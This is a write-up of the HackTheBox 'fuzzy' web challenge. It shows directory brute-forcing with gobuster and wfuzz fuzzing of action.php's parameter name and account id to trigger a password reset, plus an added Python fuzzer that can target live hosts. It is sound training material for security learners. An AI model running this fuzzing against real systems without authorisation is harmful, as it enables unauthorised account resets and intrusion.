Write-up of the "fuzzy" web challenge from HTB.

Description:

This is an easy web challenge from HackTheBox; the description says we should get the admin password.
From the challenge name we can guess that it is related to web fuzzing.

I started the instance and visited the challenge page, but found nothing interesting there.

Then I used gobuster to brute-force directories and files.

I found a directory called /api with a 301 response, so I ran gobuster again against /api to look for files, this time telling it to try the php extension (-x php).

Bingo! I found a page called /api/action.php with a 200 response.
I visited that page and it returned an error.

The error says that the parameter is not set, so action.php expects a query parameter, but we don't know its name. We can brute-force it, though.

I intercepted the request with Burp to capture the details of the request that I would need for the fuzzer.

I used wfuzz to fuzz the parameter name, filtering out the responses whose content length matched the "parameter not set" error, so that only a different response stands out.

As we can see, the parameter name turned out to be reset.

Requesting the page with this parameter gave a different error, saying that the account id was not found. So the next step is to fuzz the account id until we get the right one.

I used wfuzz again, this time to brute-force the value of the reset parameter, with the big.txt wordlist (you can find it in the dirb wordlists directory).

And voilà! We found the right account: ID 20. Now we can reset the password of that account.

I sent the request action.php?reset=20 and the response contained the flag!
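The two fuzzing steps above (find the parameter name, then find the accepted value), written out as a small Python fuzzer with the same content-length filter that wfuzz applies. This is an added example, not code from the challenge or from the write-up: the target is a constructed in-process stand-in for /api/action.php called fake_action_php, its error and success strings are made up, and the flag is a placeholder. To run it against a live host, pass http_sender("http://host/api/action.php") instead of fake_action_php and feed it a real wordlist such as big.txt.

```python
"""Parameter-name and parameter-value fuzzing with a content-length filter.

Added example, not the challenge's own code. The target is a constructed
in-process stand-in for /api/action.php (fake_action_php); to run against
a live host, pass http_sender("http://host/api/action.php") instead.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# A sender takes the query parameters for one request and returns the body.
Sender = Callable[[Dict[str, str]], str]

# Constructed stand-in for the challenge endpoint. Only the shape of its
# behaviour is assumed: a "not set" error, an "id not found" error, and a
# distinct success body. The parameter name and id are the ones the
# write-up found; the message texts and the flag are made up.
VALID_PARAM = "reset"
VALID_ID = "20"


def fake_action_php(params: Dict[str, str]) -> str:
    if VALID_PARAM not in params:
        return "ERROR: parameter not set"
    if params[VALID_PARAM] != VALID_ID:
        return "ERROR: account id not found"
    return "Password reset for account 20. FLAG{constructed-example}"


def http_sender(base_url: str) -> Sender:
    """Real transport: GET base_url?<params>, returning the body even on 4xx/5xx."""
    def send(params: Dict[str, str]) -> str:
        url = base_url + "?" + urllib.parse.urlencode(params)
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.read().decode(errors="replace")
    return send


def fuzz(send: Sender, build: Callable[[str], Dict[str, str]],
         words: Iterable[str]) -> List[Tuple[str, int]]:
    """Send one request per word and keep those whose body length differs
    from a baseline request built from a word that cannot be valid.

    This is the same idea as wfuzz's --hh (hide by chars) filter: the
    "wrong guess" response has a fixed length, anything else is a hit.
    """
    baseline_len = len(send(build("__fuzz_baseline__")))
    hits: List[Tuple[str, int]] = []
    for word in words:
        body = send(build(word))
        if len(body) != baseline_len:
            hits.append((word, len(body)))
    return hits


def fuzz_param_names(send: Sender, names: Iterable[str]) -> List[Tuple[str, int]]:
    """Step 1: find which query parameter name action.php expects."""
    return fuzz(send, lambda name: {name: "1"}, names)


def fuzz_param_values(send: Sender, name: str,
                      values: Iterable[str]) -> List[Tuple[str, int]]:
    """Step 2: find which value for that parameter is accepted."""
    return fuzz(send, lambda value: {name: value}, values)


def solve(send: Sender, names: Iterable[str],
          values: Iterable[str]) -> Dict[str, str]:
    """Run both steps and return the winning parameter, value and final body."""
    name_hits = fuzz_param_names(send, names)
    if len(name_hits) != 1:
        raise RuntimeError(f"expected exactly one parameter hit, got {name_hits}")
    name = name_hits[0][0]
    value_hits = fuzz_param_values(send, name, values)
    if len(value_hits) != 1:
        raise RuntimeError(f"expected exactly one value hit, got {value_hits}")
    value = value_hits[0][0]
    return {"param": name, "value": value, "body": send({name: value})}


if __name__ == "__main__":
    # Constructed mini wordlists; in practice read them from a file like big.txt.
    names = ["id", "user", "action", "reset", "token"]
    values = [str(i) for i in range(1, 51)]
    print(solve(fake_action_php, names, values))
```

Two caveats a practitioner should keep in mind. First, the length filter only works because the "wrong guess" response has a stable size; if the page embeds something that varies per request (a timestamp, a CSRF token), filter on a regex for the error string or on word count instead. Second, the filter would miss a valid guess whose response happens to be exactly as long as the error, so when a wordlist produces no hits it is worth re-running with a different filter before concluding the name or value is not in the list.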

Finally, thank you, and I hope you learned something new!

For any questions, you can find me on:
